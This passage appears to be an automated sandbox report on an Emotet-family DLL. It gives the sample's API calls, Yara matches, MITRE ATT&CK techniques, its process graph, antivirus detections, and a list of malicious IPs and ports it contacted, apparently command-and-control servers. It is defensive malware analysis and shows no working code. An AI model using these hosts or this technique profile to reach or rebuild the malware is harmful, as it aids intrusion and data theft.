                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_1003EABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_1003DBA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_1003EBF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_1003DC64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_1003DCCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_1003DD07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_1003CE40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,4_2_1003E000
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,4_2_1003D098
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,4_2_1002129B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,4_2_1003D35E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,4_2_1003850E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,4_2_1003D7AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_1003C7D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_1003D8C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_1003D95D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_1003D9D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_1003F9F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,4_2_1003EA86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,4_2_1003EABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_1003DBA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_1003EBF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_1003DC64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_1003DCCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,4_2_1003DD07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,4_2_1003CE40
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003732F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_1003732F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10024F01 _memset,GetVersionExA,3_2_10024F01
                      Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.59f0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5630000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4720000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5690000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.53f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.b50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56c0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2ae0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ae0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5500000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5420000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5660000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.b80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.53f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.11c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59f0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3600000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4780000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.54d0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.11c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a20000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2ab0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ae0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4750000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4720000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5690000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.b20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5630000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.54d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.c60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.11f0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4780000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.680031217.0000000002AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.687070469.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.684992268.0000000003450000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.703964616.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.687871792.0000000005661000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.687254093.0000000005501000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.686420197.00000000053F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688080295.0000000005690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.687539122.0000000005630000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670630923.0000000001270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.679124499.0000000002AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717791244.00000000047B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.687321793.0000000000B81000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717740715.0000000004780000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.679046535.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.670153557.0000000000C61000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.670105180.0000000000980000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.679999425.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688465307.00000000059F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.716834900.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688659098.0000000005A21000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670654175.00000000012A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.716329937.0000000000B21000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688152191.00000000056C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717660130.0000000004720000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.715971380.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.686930115.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.716952958.00000000011F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717702240.0000000004751000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.685377727.0000000003601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.686624450.0000000005421000.00000020.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,2_2_10001160
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,3_2_10001160
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,4_2_10001160

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API2DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerSystem Information Discovery25SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsSecurity Software Discovery41SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Regsvr321/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553389 Sample: YBfn5E3Dlw Startdate: 14/01/2022 Architecture: WINDOWS Score: 92 44 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->44 46 85.214.67.203 STRATOSTRATOAGDE Germany 2->46 48 23 other IPs or domains 2->48 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 3 other signatures 2->62 11 loaddll32.exe 1 2->11         started        13 svchost.exe 4 2->13         started        15 svchost.exe 1 2->15         started        17 2 other processes 2->17 signatures3 process4 process5 19 cmd.exe 1 11->19         started        21 rundll32.exe 2 11->21         started        25 regsvr32.exe 11->25         started        27 WerFault.exe 3 9 11->27         started        29 WerFault.exe 13->29         started        dnsIp6 31 rundll32.exe 19->31         started        50 192.168.2.1 unknown unknown 21->50 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->66 33 rundll32.exe 25->33         started        signatures7 process8 process9 35 rundll32.exe 2 31->35         started        signatures10 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->64 38 rundll32.exe 35->38         started        process11 process12 40 rundll32.exe 38->40         started        dnsIp13 52 45.138.98.34, 49790, 80 M247GB Germany 40->52 54 69.16.218.101, 49791, 8080 LIQUIDWEBUS United States 40->54 68 System process connects to network (likely due to code injection or exploit) 40->68 signatures14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      YBfn5E3Dlw.dll14%VirustotalBrowse
                      YBfn5E3Dlw.dll16%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.rundll32.exe.b50000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.2.loaddll32.exe.2ab0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.56c0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.1270000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.59f0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.2.loaddll32.exe.2ae0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.2ae0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.12a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.3450000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.5420000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.5500000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.2ab0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      11.2.rundll32.exe.b80000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.53f0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.5660000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.11c0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4780000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.3600000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.47b0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.2ab0000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4f0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.5a20000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.4750000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.2ae0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.4720000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      7.2.rundll32.exe.5690000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.b20000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.5630000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      2.2.regsvr32.exe.c60000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.54d0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.11f0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.980000.0.unpack100%AviraHEUR/AGEN.1145233Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 00000013.00000002.823886227.000002EBAE6E9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://upx.sf.netAmcache.hve.12.drfalse
                        		high
                        https://www.tiktok.com/legal/reportsvchost.exe, 00000013.00000003.800383001.000002EBAEF79000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000013.00000003.800332710.000002EBAEFA1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800427811.000002EBAF402000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800351036.000002EBAEFA1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800401036.000002EBAEF8A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800383001.000002EBAEF79000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://help.disneyplus.com.svchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://disneyplus.com/legal.svchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        207.148.81.119
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue
                        104.131.62.48
                        		unknownUnited States
                        		14061DIGITALOCEAN-ASNUStrue
                        85.214.67.203
                        		unknownGermany
                        		6724STRATOSTRATOAGDEtrue
                        191.252.103.16
                        		unknownBrazil
                        		27715LocawebServicosdeInternetSABRtrue
                        168.197.250.14
                        		unknownArgentina
                        		264776OmarAnselmoRipollTDCNETARtrue
                        66.42.57.149
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue
                        185.148.168.15
                        		unknownGermany
                        		44780EVERSCALE-ASDEtrue
                        51.210.242.234
                        		unknownFrance
                        		16276OVHFRtrue
                        217.182.143.207
                        		unknownFrance
                        		16276OVHFRtrue
                        69.16.218.101
                        		unknownUnited States
                        		32244LIQUIDWEBUStrue
                        159.69.237.188
                        		unknownGermany
                        		24940HETZNER-ASDEtrue
                        45.138.98.34
                        		unknownGermany
                        		9009M247GBtrue
                        116.124.128.206
                        		unknownKorea Republic of
                        		9318SKB-ASSKBroadbandCoLtdKRtrue
                        78.46.73.125
                        		unknownGermany
                        		24940HETZNER-ASDEtrue
                        37.59.209.141
                        		unknownFrance
                        		16276OVHFRtrue
                        210.57.209.142
                        		unknownIndonesia
                        		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                        185.148.168.220
                        		unknownGermany
                        		44780EVERSCALE-ASDEtrue
                        54.37.228.122
                        		unknownFrance
                        		16276OVHFRtrue
                        190.90.233.66
                        		unknownColombia
                        		18678INTERNEXASAESPCOtrue
                        142.4.219.173
                        		unknownCanada
                        		16276OVHFRtrue
                        54.38.242.185
                        		unknownFrance
                        		16276OVHFRtrue
                        195.154.146.35
                        		unknownFrance
                        		12876OnlineSASFRtrue
                        195.77.239.39
                        		unknownSpain
                        		60493FICOSA-ASEStrue
                        78.47.204.80
                        		unknownGermany
                        		24940HETZNER-ASDEtrue
                        37.44.244.177
                        		unknownGermany
                        		47583AS-HOSTINGERLTtrue
                        62.171.178.147
                        		unknownUnited Kingdom
                        		51167CONTABODEtrue
                        128.199.192.135
                        		unknownUnited Kingdom
                        		14061DIGITALOCEAN-ASNUStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:553389
                        Start date:14.01.2022
                        Start time:19:48:48
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:YBfn5E3Dlw (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal92.troj.evad.winDLL@26/10@0/28
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 98.9% (good quality ratio 92.4%)
                        • Quality average: 70.5%
                        • Quality standard deviation: 26.8%
                        HCA Information:
                        • Successful, ratio: 76%
                        • Number of executed functions: 45
